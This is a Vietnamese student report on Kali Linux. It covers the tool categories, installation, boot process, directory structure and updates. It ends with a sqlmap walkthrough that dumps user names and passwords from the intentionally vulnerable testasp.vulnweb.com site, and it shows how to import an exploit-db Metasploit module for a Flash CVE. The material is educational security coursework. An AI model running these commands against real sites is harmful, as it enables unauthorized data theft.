Đang tải... (xem toàn văn)
I.Tổng quan về hệ điều hành Kali Linux1.Lịch sử2.Đặc điểm3.Các ứng dụng trong Kali LinuxII.Cài đặt Kali LinuxIII.Kiến trúc hệ điều hành Kali Linux1.Cấu trúc hệ thống Unix2.Kiến trúc nhân3.Quá trình khởi động của hệ điều hành Kali Linux4.Cấu trúc thư mụcIV.Cách thêm ứng dụng – cập nhật mã lỗi1.Cách thêm ứng dụng, plugin cho Kali Linux2.Cách cập nhật cho Kali Linux3.Hướng dẫn dùng sqlmap để khai thác lỗi sql injection
BỘ THÔNG TIN VÀ TRUYỀN THÔNG HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THƠNG - TÌM HIỂU VỀ HỆ ĐIỀU HÀNH KALI LINUX Mơn học: An tồn mạng Giảng viên: Nguyễn Hồng Thắng Nhóm sinh viên (nhóm 02): Lê Anh Dũng – B14DCAT185 Đinh Duy Đông – B14DCAT217 Nguyễn Đức Kiên – B14DCAT202 Trịnh Đức Quang – B14DCAT233 Nguyễn Đình Thái – B14DCAT161 Hà Nội, 2017 Hệ điều hành Kali Linux MỤC LỤC Nội dung I Tổng quan hệ điều hành Kali Linux .3 Lịch sử .3 Đặc điểm 3 Các ứng dụng Kali Linux II Cài đặt Kali Linux III Kiến trúc hệ điều hành Kali Linux 17 Cấu trúc hệ thống Unix 17 Kiến trúc nhân 18 Quá trình khởi động hệ điều hành Kali Linux 19 Cấu trúc thư mục 22 IV Cách thêm ứng dụng – cập nhật mã lỗi .33 Cách thêm ứng dụng, plugin cho Kali Linux 33 Cách cập nhật cho Kali Linux 33 Hướng dẫn dùng sqlmap để khai thác lỗi sql injection .35 Hệ điều hành Kali Linux I Tổng quan hệ điều hành Kali Linux Lịch sử Kali Linux hệ điều hành xây dựng nhân Linux, thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập hệ thống máy tính Tiền thân Kali Linux BackTrack, xuất năm 2006 chuyên gia đánh giá bảo mật ưa chuộng sử dụng Sau năm liên tục phát triển, tháng năm 2013, hãng Offensive Security công bố phiên BackTrack có tên Kali Linux (được xem phiên BackTrack 6) Kali Linux tập hợp phân loại gần tất công cụ thiết yếu mà chuyên gia đánh giá bảo mật cần sử dụng tác nghiệp Đặc điểm Nói ưu điểm Kali nói thay đổi BackTrack Kali So với BackTrack, Kali có nhiều cải tiến: Kali phát triển tảng hệ điều hành Debian Tính tương thích kiến trúc Hỗ trợ mạng không dây tốt Khả tùy biến cao Dễ dàng nâng cấp phiên Kali tương lai Các ứng dụng Kali Linux Kali cài đặt 600 công cụ tùy theo nhu cầu đánh giá xếp, phân loại rõ ràng dựa mục đích sử dụng để người dùng sử dụng công cụ cách tối ưu Thu thập thơng tin – Information Gathering Nhóm phân loại gồm công cụ tập trung vào việc thu thập thông tin mục tiêu Trong phân loại có số lượng lớn cơng cụ phân chia theo loại thông tin cần thu thập như: OS Fingerprinting (Thu thập thông tin hệ điều hành) Hệ điều hành Kali Linux Network Scanners (Dò quét cổng, dò quét mạng, dò quét phiên dịch vụ) SSL Analysis (Phân tích giao thức SSL) VoIP Analysis (Phân tích giao thức VoIP) Trong số cơng cụ có số cơng cụ tiếng, hữu ích thực đánh giá bảo mật hạ tầng mạng lưới điện tốn, Nmap Với Nmap, biết Ports (cổng dịch vụ) Open, Filtered Closed, ngồi xác định phiên dịch vụ (Banner version) thực phá đoán phiên hệ điều hành mà mục tiêu sử dụng Phân tích lỗ hổng – Vulnerability Analysis Những cơng cụ nằm nhóm tập trung vào việc phát lỗ hổng bảo mật như: lỗ hổng ứng dụng, lỗ hổng hạ tầng mạng, mạng lưới phần cứng chuyên dụng Vì có nhiều cơng cụ Vulnerability Scanner (Dò quét lỗ hổng) Fuzzers (Kiểm thử) Một số cơng cụ kể đến như: SQLMap: Đây cơng cụ tuyệt vời mà thực giúp bạn tìm kiếm khai thác lỗ hổng SQL Injection Với công cụ này, bạn định ứng dụng web thông số bạn muốn kiểm tra, phần lại phần mềm tự động hóa thực Ứng dụng Web – Web Applications Nhóm phân loại gồm công cụ dùng để phát công lỗ hổng ứng dụng Web Trong có số cơng cụ đáng để quan tâm, Burp Suite (có hai phiên Free Pro) Một tính Burp Suite khả Intercept (đánh chặn) tất HTTP Request gửi đến ứng dụng Web, nhờ chỉnh sửa, thay đổi, kiểm thử tham số gửi đến ứng dụng Hệ điều hành Kali Linux Burp Suite không công cụ đánh chặn, mà cơng cụ tốt để thực phân tích lỗ hổng ứng dụng Web tự động thủ công Đánh giá CSDL – Database Assesment Nhóm gồm ứng dụng chủ yếu liên quan đến sở liệu SQL JSQL ứng dụng nhẹ sử dụng để tìm thông tin sở liệu từ máy xa SQLNinja công cụ nhằm khai thác lỗ hổng SQL Injection ứng dụng web sử dụng Microsoft SQL Server làm backend Tấn cơng mật – Password Attacks Trong nhóm tìm thấy cơng cụ bẻ khóa mật Offline hay khởi tạo công mật vào giao thức Công cụ đáng ý phân loại John the Ripper, oclhashcat-plus, Medusa THC-Hydra Nhiều cơng cụ hữu ích tìm thấy đây, từ cơng cụ công mật trực tuyến đến cơng ngoại tuyến chống lại mã hóa hệ thống băm John the Ripper công cụ phần mềm bẻ khóa mật ban đầu phát triển cho hệ điều hành Unix Nó chương trình testing/breaking mật phổ biến có kết hợp số cracker mật khẩu, tự động phát kiểu mật có cracker có khả tùy chỉnh Cơng cụ chạy cho định dạng mật mã hóa chẳng hạn kiểu mật mã hóa thấy số Unix khác (dựa DES, MDS Blowfish), Kerberos AFS Windows NT/2000/XP/2003 LM hash Bên cạnh có modul bổ sung mở rộng khả gồm có kiểu mật MD4 mật lưu LDAP, MySQL thành phần khác Oclhashcat-plus công cụ dùng để giải mã md5crypt, phpass, mscash2 WPA / WPA2 Hệ điều hành Kali Linux Medusa THC-Hydra giúp khởi tạo công Brute Force giao thức HTTP, FTP, SSH, RDC Tấn công mạng không dây – Wireless Attacks Sự phổ biến mạng không dây khiến chúng mục tiêu thường bị cơng Các cơng cụ thuộc nhóm dùng để phân tích cơng giao thức mạng IEEE 802.11 Công cụ hữu dụng phần để thực phân tích giao thức IEEE 802.11 (WiFi) aircrack-ng Công cụ cho phép thực nhiều kiểu công khác với chế xác thực (authentication) ủy quyền (authorization) mạng WiFi Reverse Engineering Phân tích malware (viruses, trojans, worms ) để biết chúng lây lan sao, lấy cắp thông tin cá nhân nào? Để xóa chúng khỏi hệ thống, hay điều tra thông tin người phát tán, cần thực hành động điều tra gì? Ví dụ: OllyDbg, trình gỡ lỗi sử dụng hợp ngữ Windows 32-bit trọng đến việc phân tích mã nhị phân hữu dụng để gỡ lỗi chương trình khơng cung cấp mã nguồn Nó dò xét ghi, nhận diện thủ tục, lời gọi hàm API, khóa chuyển, bảng, số chuỗi, vị trí routines từ tập tin đối tượng thư viện Exploitation Tools Khai thác, lợi dụng lỗ hổng xác định, cho phép điều khiển máy tính, thiết bị từ xa Ví dụ: metasploit framework mơi trường dùng để kiểm tra ,tấn công khai thác lỗi service Metasploit xây dựng từ ngôn ngữ hướng đối tượng Perl, với components viết C, assembler, Python.Metasploit Hệ điều hành Kali Linux chạy hầu hết hệ điều hành: Linux, Windows, MacOS Nghe lén/ giả mạo – Sniffing/Spoofing Sniffing/Spoofing cung cấp công cụ để chặn lưu lượng mạng đường truyền, xác định giao thức sử dụng, phân tích liệu quan trọng Một chương trình nghe tốt Wireshark Với Wireshark bạn intercept lưu lượng mạng xác định giao thức sử dụng, phân tích highlight liệu quan trọng Post Exploitation Một bạn có quyền truy cập vào hệ thống, bạn thường muốn trì mức độ truy cập mở rộng kiểm soát cách di chuyển ngang qua mạng Các công cụ hỗ trợ cho mục tiêu tìm thấy Ví dụ: backdoor factory, shellcode cho phép bạn tiêm vào file thực thi chạy windows 32/64bit, mà file thực thi chạy bình thường Cơng cụ viết nhà nghiên cứu bảo mật Joshua Pitts trình diễn hội nghị bảo mật Debycon 2013 Forensic Mục đích sử dụng kỹ thuật forensics tìm kiếm, trì phân tích thơng tin hệ thống máy tính để tìm kiếm chứng phạm tội cho vụ án Ví dụ: chkrootkit chương trình Unix nhằm giúp quản trị viên hệ thống kiểm tra hệ thống họ rootkit Nó kịch sử dụng công cụ UNIX/Linux giống chuỗi lệnh grep để tìm kiếm dấu hiệu chương trình hệ thống lõi so sánh mâu thuẫn Hệ điều hành Kali Linux /proc filesystem với đầu lệnh ps (process status) nhằm tìm kiếm vấn đề khác Chương trình sử dụng từ “đĩa giải cứu” có sử dụng thư mục khác để chạy tất lệnh riêng Tuy có số hạn chế cố hữu độ tin cậy chương trình muốn phát thỏa hiệp (chẳng hạn rootkit virus máy tính) Các rootkit phát thỏa hiệp copy chương trình chkrootkit dùng thủ đoạn khác để vòng tránh phát chương trình Reporting Tools Reporting Tools (Các công cụ dành cho việc báo cáo): gồm công cụ giúp tạo báo cáo sau hồn tất cơng việc đánh giá bảo mật, dựa kết mà tìm thấy Ví dụ, cơng cụ recordMyDesktop, nhiệm vụ đơn giản tạo File video ghi lại hoạt động bạn máy tính Social Engineering Tools Đây phương pháp công đơn giản lại vơ hiệu cơng trực tiếp vào thiếu hiểu biết người dùng Phương pháp kể từ đời đến phương pháp hiệu khơng có dạng cố địch, tùy biến tùy vào kẻ cơng khả phòng thủ vơ khó khăn VD: social engineering toolkit(SET) công cụ mã nguồn mở trợ giúp cho việc thử nghiệm xâm nhập theo kiểu Social Engineering Social Engineering phương pháp kỹ thuật đột nhập vào hệ thống mạng cơng ty Đó q trình đánh lừa người dùng hệ thống, thuyết phục họ cung cấp thơng tin giúp đánh bại phận an ninh Hình thức cơng chia làm dạng chính: Hệ điều hành Kali Linux - Human-base: dựa vào kỹ thuật khai thác mối quan hệ người với người - Computer-base: công dựa vào trợ giúp máy tính Những hình thức biết phising, fake website… System Services Danh mục chứa công cụ cho phép bạn khởi động dừng ứng dụng chạy hệ thống dịch vụ VD: beef start, beef stop II Cài đặt Kali Linux 1) Chuẩn bị: - Bản cài đặt Kali Linux dạng file ISO - Phần mềm VMWare 2) Chúng ta mở phần mềm VMWare tùy chọn bình thường, đến phần chọn hệ điều hành: Hệ điều hành Kali Linux Chọn Customize hardware để chỉnh sửa vài thông số (Ram >= 1.5 GB – Processors > – Network chọn bridged) 10 Hệ điều hành Kali Linux Các InitScript thực thi dựa RunLevel chọn: Nếu bạn kiểm tra file /etc/inittab, bạn thấy bao gồm hầu hết đặc tả, dẫn để chạy chương trình Các script có tên bắt đầu ký tự S thực thi, cách này, init khởi động tất hệ thống (subsystem) dịch vụ (deamon) để tạo thành hệ thống Linux hoạt động hoàn chỉnh Tại thời điểm này, Linux khởi động xong, init hồn thành vai trò mình: tạm thời “ngủ” (ở trạng thái chờ đợi) có chương trình bị chết cần khởi động lại Tất hoạt động hệ thống thực deamon khác Đăng nhập với giao diện đồ họa: Subsystem cuối init khởi động lên X Window (còn có tên gọi khác X.Org, Xorg, hay đơn giản X), hệ thống cung cấp giao diện đồ họa người dùng (GUI) Linux Một thành phần X gọi XDM đưa cho bạn hình đăng nhập dạng GUI Tuy nhiên, XDM chưa thực thân thiện với người dùng nên XDM thay GDM (nằm gói GNOME), KDM (nằm gói KDE) Entrance (nằm gói Enlightenment) Khi bạn đăng nhập thành cơng vào hệ thống: Một chương trình shell (có thể bash, sh, csh…) bắt đầu Tất chương trình mà bạn chạy thao tác khác mà bạn thực suốt phiên làm việc thực shell chương trình khác mà shell khởi động Khi bạn đăng xuất, shell tất tiến trình bị kết thúc Sau init (hoặc XDM/GDM/KDM/Entrance) “thức tỉnh” bắt đầu lời nhắc nhở đăng nhập 22 Hệ điều hành Kali Linux Cấu trúc thư mục Hệ điều hành Linux hình thành từ nhiều thư mục tập tin khác Các thư mục lập thành nhiều file system khác nhau, tùy vào cách cài đặt bạn chọn Nhìn chung, đa phần hệ điều hành nằm hai file system: root file system (file system gốc) ký hiệu /, file system khác kết nối theo /usr (đọc user) Hình 4: Cây thư mục hệ thống kali linux / – Root 23 Hệ điều hành Kali Linux Đúng với tên gọi mình: nút gốc (root) nơi bắt đầu tất file thư mục, thư mục mức cao Chỉ có root user có quyền ghi thư mục Chú ý /root thư mục home root user / /bin – Chương trình người dùng Thư mục chứa chương trình thực thi Các chương trình chung Linux sử dụng tất người dùng lưu Ví dụ như: ps, ls, ping… Đối lập với /sbin/ thư mục /bin chứa nhiều ứng dụng khác dùng cho việc bảo trì hệ thống root, lệnh cho người dùng thông thường Thư mục thông thường chứa hệ vỏ (Shell), nhiều lệnh hữu dụng cp (sao chép), mv (di chuyển), cat, ls Cũng giống sbin, thư mục /usr/bin chứa tệp tin có chức tương tự /bin /sbin – Chương trình hệ thống Cũng giống /bin, /sbinn chứa chương trình thực thi, chúng chương trình admin, dành cho việc bảo trì hệ thống Ví dụ như: reboot, fdisk, iptables… /sbin chứa đựng file thực thi dạng binary (nhị phân) chương trình giúp hệ thống hoạt động Các lệnh bên /sbin thường sử dụng dùng cho mục đích trì quản trị hệ thống Các lệnh yêu cầu phải có quyền root Một số lệnh ví dụ: lilo, fdisk, init, ifconfig v.v Để liệt kê, bạn dùng lệnh “ls /sbin/” Còn thư mục mà chứa tệp tin thi hành cho hệ thống /usr/sbin/ Nhưng chương trình khơng sử dụng để bảo trì hệ thống 24 Hệ điều hành Kali Linux /etc – Các file cấu hình Thư mục chứa file cấu hình chương trình, đồng thời chứa shell script dùng để khởi động tắt chương trình khác Ví dụ: /etc/resolv.conf, /etc/logrolate.conf /etc chứa file cấu hình cho chương trình hoạt động Chúng thường tệp tin dạng text thường Chức gần giống với “Control Panel” Windows Ví dụ: /etc/resolv.conf (cấu hình dns-server ) /etc/network dùng để quản lý dịch vụ network Ở /etc có thư mục quan trọng /etc/rc.d Nơi thường chứa scripts dùng để start, stop, kiểm tra status cho chương trình /dev – Các file thiết bị Các phân vùng ổ cứng, thiết bị ngoại vi USB, ổ đĩa cắm ngoài, hay thiết bị gắn kèm vào hệ thống lưu Ví dụ: /dev/sdb1 tên USB bạn vừa cắm vào máy, để mở USB bạn cần sử dụng lệnh mount với quyền root: # mount /dev/sdb1 /tmp Đây thư mục thú vị nhất, thể cách rõ ràng hệ điều hành Linux coi thứ tệp tin thư mục Trong thư mục bạn thấy nhiều tệp tin đại diện cho thiết bị ổ đĩa SATA, cổng COM v.v Bạn liệt kê chúng lệnh ls /dev/ Bạn thấy nhiều khơng phải chúng có thật máy tính bạn đâu Chẳng hạn bạn có cổng COM bạn thấy khơng có 25 Hệ điều hành Kali Linux Ví dụ: /dev/sda : ổ đĩa SATA thứ /dev/cdrom : ổ CD /dev/ttyS0 : cổng COM1 /tmp – Các file tạm Thư mục chứa file tạm thời tạo hệ thống người dùng Các file lưu thư mục bị xóa hệ thống khởi động lại /proc – Thơng tin tiến trình Thơng tin tiến trình chạy lưu /proc dạng hệ thống file thư mục mô Ví dụ thư mục /proc/{pid} chứa thơng tin tiến trình có ID pid (pid ~ process ID) Ngồi nơi lưu thơng tin về tài nguyên sử dụng hệ thống như: /proc/version, /proc/uptime… Ví dụ:/proc/cpuinfo cung cấp cho ta thông số kỹ thuật CPU Để xem bạn dùng lệnh ‘cat': cat /proc/cpuinfo /var – File biến chương trình Thơng tin biến hệ thống lưu thư mục Như thông tin log file: /var/log, gói sở liệu /var/lib… /var chứa đựng file có thay đổi trình hoạt động hệ điều hành ứng dụng Ví dụ: + Nhật ký hệ thống /var/log + database file /var/lib + email /var/mail 26 Hệ điều hành Kali Linux + Các hàng đợi in ấn: /var/spool + lock file: /var/lock + Các file tạm thời cần cho trình reboot: /var/tmp + Dữ liệu cho trang web: /var/www Để biết thư mục nằm phân vùng bạn sử dụng lệnh df với đối số dấu chấm (.) biểu diễn thư mục hành df -h Theo quy tắc chung, thư mục nằm thư mục root nằm phân vùng root, có phân vùng riêng số phân vùng liệt kê lệnh df (hay df -h mà khơng có tùy chọn khác) Bạn đọc thêm cấu trúc hệ thống tệp tin Linux lệnh ‘man hier’ Trên nhìn tổng quan hệ thống tệp tin hệ điều hành Linux Còn tùy thuộc vào phân phối, cấu trúc khác chút thêm hay bớt số thư mục Đến bạn thấy hệ điều hành Linux tổ chức hệ thống thư mục tệp tin cách thống Một ứng dụng gồm nhiều thành phần khác lưu giữ nhiều thư mục riêng biệt Chẳng hạn tệp tin binary lưu /usr/local/bin liệu lại lưu trong/usr/share/* /usr – Chương trình người dùng Chứa thư viện, file thực thi, tài liệu hướng dẫn mã nguồn cho chương trình chạy level hệ thống Trong - /usr/bin chứa file thực thi người dùng như: at, awk, cc, less… Nếu bạn 27 Hệ điều hành Kali Linux khơng tìm thấy chúng /bin tìm /usr/bin - /usr/sbin chứa file thực thi hệ thống quyền admin như: atd, cron, sshd… Nếu bạn khơng tìm thấy chúng /sbin tìm thư mục - /usr/lib chứa thư viện cho chương trình /usr/bin /usr/sbin - /usr/local chứa chương tình người dùng cài từ mã nguồn Ví dụ bạn cài apache từ mã nguồn, lưu /usr/local/apache2 10 /home – Thư mục người dùng Thư mục chứa tất file cá nhân người dùng Nó giống thư mục “C:\Documents and Settings” Windows XP Ví dụ: /home/john, /home/marie 11 /boot – Các file khởi động Nhìn tên bạn đốn dùng làm phải khơng Nó chứa tệp tin khởi động nhân kernel vmlinuz Trong phân phối gần đây, chứa liệu cho grub Phần mềm khởi động Grub (viết tắt GRand Unified Boot loader) ngày sử dụng phổ biến /boot chứa tất file yêu cầu khởi động initrd, vmlinux grub lưu Ví dụ vmlixuz-2.6.32-24-generic 12 /lib – Thư viện hệ thống Chứa cá thư viện hỗ trợ cho file thực thi /bin /sbin Các thư viện thường có tên bắt đầu ld* lib*.so.* Ví dụ ld-2.11.1.so hay libncurses.so.5.7 28 Hệ điều hành Kali Linux 13 /opt – Các ứng dụng phụ tùy chọn Tên thư mục nghĩa optional (tùy chọn), chứa ứng dụng thêm vào từ nhà cung cấp độc lập khác Các ứng dụng cài /opt thư mục /opt 14 /mnt – Thư mục để mount Đây thư mục tạm để mount file hệ thống Ví dụ # mount /dev/sda2 /mnt /mnt chứa thư mục dùng để system admin thực q trình mount Như nói, hệ điều hành Linux coi tất file lưu giữ chung Đây nơi tạo thư mục để ‘gắn’ phân vùng ổ đĩa cứng thiết bị khác vào Sau mount vào đây, thiết bị hay ổ cứng truy cập từ thư mục Trong số hệ điều hành, ổ đĩa chưa gắn sẵn vào hệ thống fstab gắn Về cách gắn tháo, có lẽ cần viết riêng 15 /media – Các thiết bị gắn gỡ bỏ Thư mục tạm chứa thiết bị CdRom /media/cdrom floppy /media/floopy hay phân vùng đĩa cứng /media/Data (hiểu ổ D:/Data Windows) 16 /srv – Dữ liệu dịch vụ khác Chứa liệu liên quan đến dịch vụ máy chủ /srv/svs, chứa liệu liên quan đến CVS 17 /lost+found (Thư mục system) Vì lý bất ngờ lỗi phần mềm, điện v v, hệ thống đổ 29 Hệ điều hành Kali Linux vỡ Khi khởi động lại, hệ thống kiểm tra lại hệ thống filesystem lệnh fchk cố gắng phục hồi lại lỗi mà tìm thấy Kết việc lưu giữ thư mục /lost+found Ý nghĩa thư mục Kali Linux Trong hệ điều hành Linux, tập tin mà người sử dụng nhìn thấy theo cấu trúc thư mục, với root nằm Từ điểm thư mục tập tin mọc nhánh lan dần xuống phía Thư mục cao nhất, ký hiệu vạch /, gọi root directory (thư mục gốc) Với người sử dụng bình thường thư mục dải tập tin thư mục nối liền Trên thực tế, nhiều thư mục thư mục nằm nhiều vị trí vật lý khác nhau, partition khác nhau, chí ổ đĩa khác Khi partition kết nối với cấu trúc thư mục gọi mount point (điểm kết nối, điểm lắp ráp), mount point tất thư mục cấp gọi file system Hệ điều hành Linux hình thành từ nhiều thư mục tập tin khác Các thư mục lập thành nhiều file system khác nhau, tùy vào cách cài đặt bạn chọn Nhìn chung, đa phần hệ điều hành nằm hai file system: root file system (file system gốc) ký hiệu /, file system khác kết nối theo /usr (đọc user) Khi dùng lệnh cd / để chuyển thư mục gốc gọi hiển thị danh sách thư mục, bạn thấy nhiều thư muc Những thư mục tạo thành nội dung root file system, đồng thời cung cấp mount point cho file system khác Thư mục /bin chứa chương trình thi hành được, gọi binaries (nhị phân) Chúng chương trình hệ thống chủ yếu Nhiều lệnh Linux, chẳng hạn ls, chương trình nằm thư mục Thư mục /sbin chứa file nhị phân hệ thống Hầu hết tập tin dùng để quản trị hệ thống (superuser-bin) Thư mục /etc quan trọng chứa nhiều file cấu hình Linux Chúng giúp cho hệ thống máy bạn có “cá tính” File mật passwd nằm thư mục này, fstab , danh sách file system cần nạp vào khởi động máy 30 Hệ điều hành Kali Linux Ngồi thư mục chứa script khởi động cho Linux, danh sách host kèm địa IP, với nhiều thơng tin cấu hình khác.Các thư viện dùng chung chứa thư mục /lib Khi dùng chung thư viện, nhiều chương trình sử dụng lại loại mã, chứa chỗ, thư viện giúp giảm thiểu kích cỡ chương trình khía cạnh thời gian chạy Thư mục /dev chứa file đặc biệt gọi device files (file thiết bị, hệ thống sử dụng để chạy phần cứng Ví dụ file/dev/mouse đọc thơng tin từ chuột Khi tổ chức sử dụng phần cứng theo cách này, Linux làm cho việc tương tác với phần cứng trơng giống phần mềm Điều có nghĩa nhiều trường hợp, bạn dùng cú pháp dùng với directory đĩa mềm, ta dùng lệnh: tar -cdf /dev/fd0 tackett /dev/fd0 cho lệnh tar biết phải dùng đĩa mềm Nhiều thiết bị thư mục /dev tập hợp thành nhóm logical Cấu trúc file : Trên Windows, bạn có quan niệm ổ đĩa C: , D: , E: v.v T Windows xem ổ đĩa gốc thư mục, vào để quản lý Nhưng Linux quan niệm không tồn Linux xếp liệu máy tính "cây thư mục nhất' Định dạng file system : Trên window có dịnh dạng FAT, FAT32, NTFS, exFAT v.v Trên Linux có định dạng , FAT, Minix, reiserFS, ext2, ext3, ext4 v.v Linux đọc hệ thống file Windows, Windows đọc hệ thống file Linux khơng format định dạng FAT Nếu đĩa cứng bạn có phân vùng , phân vùng cài đặt Windows, tên WIN (NTFS) , phân vùng để lưu liệu, tên DATA (FAT32) , phân vùng (WAP) , phân vùng cài đặt Linux, tên LINUX (ext4) 31 Hệ điều hành Kali Linux Vậy : - Khi chạy Windows : bạn thấy explorer hiển thị C: WIN , D: DATA (Explorer trình quản lý file Windows) Đường dẫn C "C:\" , đường dẫn D "D:\" - Khi chạy Linux : bạn thấy Nautilus hiển thị : WIN, DATA, File System Trong WIN thư mục toàn liệu phân vùng cài Windows, DATA thư mục chứa toàn liệu phân vùng DATA, File System thư mục toàn liệu phân vùng ext4 Đường dẫn File System "/" , đường dẫn chủa WIN "/media/WIN", đường dẫn DATA "/media/DATA" Vậy Linux chẳng phân ổ đĩa cả, thứ điều xem thư mục thư mục lớn "/" Registry : Windows có Registry Linux khơng có : Registry windows xem khung máy tính, lưu trữ tồn thông tin ứng dụng, thiết đặt chức năng, mật người dùng, thơng tin thiết bị Linux khơng có Registry, ứng dụng Linux lưu thiết đặt nội thân sở phân cấp người dùng Tức tạo modul đặt thư mục có quyền truy cập khác Khi người dùng đăng nhập máy tính cấp độ ứng dụng truy cập đến modul thư mục mà họ có quyền truy cập Linux thực chất tên hạt nhân hệ điều hành giống Unix, thực tính tốn chủ yếu dòng lệnh Để tạo hệ điều hành hồn chỉnh, người ta đóng gói nhân Linux với thư viện công cụ GNU Cho nên cách đóng gói khác tạo sắc thái, chức khác Có nhiều hệ điều hành nhân Linux nay, hay gọi Distro, Ubuntu, Kubuntu, Xubuntu, Lubuntu, Linuxt Mint, Fedora, Red Hat, Red Star, Androids v.v… Cuối : Windows hệ điều hành mã nguồn đóng sở hữ tư nhân Microsoft Linux hệ điều hành mã nguồn mỡ quyền sở hữu thuộc tất người, có kiến thức, điều download Linux xem mã nguồn nó, chỉnh sửa tùy ý 32 Hệ điều hành Kali Linux IV Cách thêm ứng dụng – cập nhật mã lỗi Cách thêm ứng dụng, plugin cho Kali Linux Ví dụ 1: Thêm trình cắm Adobe Flash Player Link tải: https://get.adobe.com/flashplayer/otherversions/ Chọn hệ điều hành -> chọn FP 11.2 for other Linux* (.tar.gz) Mở Terminal gõ cách lệnh để tiến hành cài đặt - # cd Download - # tar vxfz - # cp -r usr/* /usr - # cp libflashplayer.so /usr/lib/mozilla/plugins/ Trình cắm thêm vào trình duyệt Mozilla FireFox Ví dụ 2: Cài đặt ứng dụng wine dung phương thức apt-get Sử dụng Teminal gõ lệnh - # apt-get update - # apt-get install wine Cách cập nhật cho Kali Linux 2.1 Cập nhật toàn hệ thống Cách 1: Dành cho phiên từ 2016.2 sau: Sử dụng Terminal gõ lệnh - #apt-get update - #apt-get upgrade Cách 2: Dành cho phiên trước 2016.2 - Mở Terminal gõ lệnh leafpad /etc/apt/sources.list - Xóa hết tất dòng file thêm dòng phía vào 33 Hệ điều hành Kali Linux deb http://http.kali.org/kali kali-rolling main contrib non-free deb-src http://http.kali.org/kali kali-rolling main contrib non-free - Quay lại Terminal thực apt-get update apt-get upgrade –y Cách 3: Cập nhật kích hoạt qua https cho bảo mật - Gõ lệnh apt install apt-transport-https - Gõ tiếp lệnh leafpad /etc/apt/sources.list bấm Enter - Xóa hết nội dung file sources.list paste vào dòng deb https://http.kali.org/kali kali-rolling main non-free contrib deb-src https://http.kali.org/kali kali-rolling main non-free contrib 2.2 Cập nhật cho Famerwork Các ứng dụng, famerwork mặc định kali linux ứng dụng, phần mềm cài đặt thông qua apt-get mặc định cập nhật tự động - Để thay đổi tùy chọn ta tiến hành mở trình soạn thảo dfcon Editor Đi đến org-> gnome -> software -> dowload update (true, false) Ví dụ: Update sở liệu cho Metasploit framework Link kiểm tra sở khai thác: https://www.exploit-db.com 34 Hệ điều hành Kali Linux Cách 1: Update riêng cho Metasploit framework Mở Terminal gõ - #msfconsole - #msfupdate Cách 2: Cập nhật cách cập nhật tồn hệ thống Kali linux - Đã nói phần Cách 3: Cập nhật thủ công qua Terminal Ví dụ cập nhật mã lỗi CVE-2014-0515 Adobe Flash Player - Shader Buffer Overflow (Metasploit) Tải file mã lỗi (33333.rb) Link tải: https://www.exploit-db.com/exploits/33333/ - Vào computer -> Filesystem->Home Tìm đến thư mục msf4 - Nếu bạn khơng tìm thư mục msf4 vào view chọn show hidden items” - Coppy file 33333.rb đến thư mục browser Vào Terminal gõ lệnh - #msfconsole - #reload_all Hướng dẫn dùng sqlmap để khai thác lỗi sql injection Link khai thác: http://testasp.vulnweb.com/showforum.asp?id=1 Bước 1: Scan thông tin sở liệu sqlmap -url ' http://testasp.vulnweb.com/showforum.asp?id=1' –dbs Kết ta thu sở liệu acuforum Bước 2: Scan bảng sở liệu acuforum sqlmap -url ' http://testasp.vulnweb.com/showforum.asp?id=1' -D acuforum –table 35 Hệ điều hành Kali Linux Kết ta thu bảng, ta công người dùng bảng users Bước 3: Scan thong tin cột bảng users sqlmap -url ' http://testasp.vulnweb.com/showforum.asp?id=1' -D acuforum -T users columns Kết ta thu cột avatar, email, uname, upass Bước 4: Lấy thong tin người dùng sqlmap -url ' http://testasp.vulnweb.com/showforum.asp?id=1' -D acuforum -T users –C avatar,email,uname,upass dump 36 ... injection .35 Hệ điều hành Kali Linux I Tổng quan hệ điều hành Kali Linux Lịch sử Kali Linux hệ điều hành xây dựng nhân Linux, thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập hệ thống máy tính... cài đặt xong Kali Linux: - Sau nhập user, mật root hình khởi động Kali Linux 16 Hệ điều hành Kali Linux III Kiến trúc hệ điều hành Kali Linux Cấu trúc hệ thống Unix Sơ đồ cấu trúc hệ thống Unix... gia: 11 Hệ điều hành Kali Linux Chọn loại bàn phím: Sau đó, đợi khoảng phút để cài đặt thành phần từ CD-ROM 12 Hệ điều hành Kali Linux Cấu hình Kali Linux: Tiếp theo điền hostname cho Kali Linux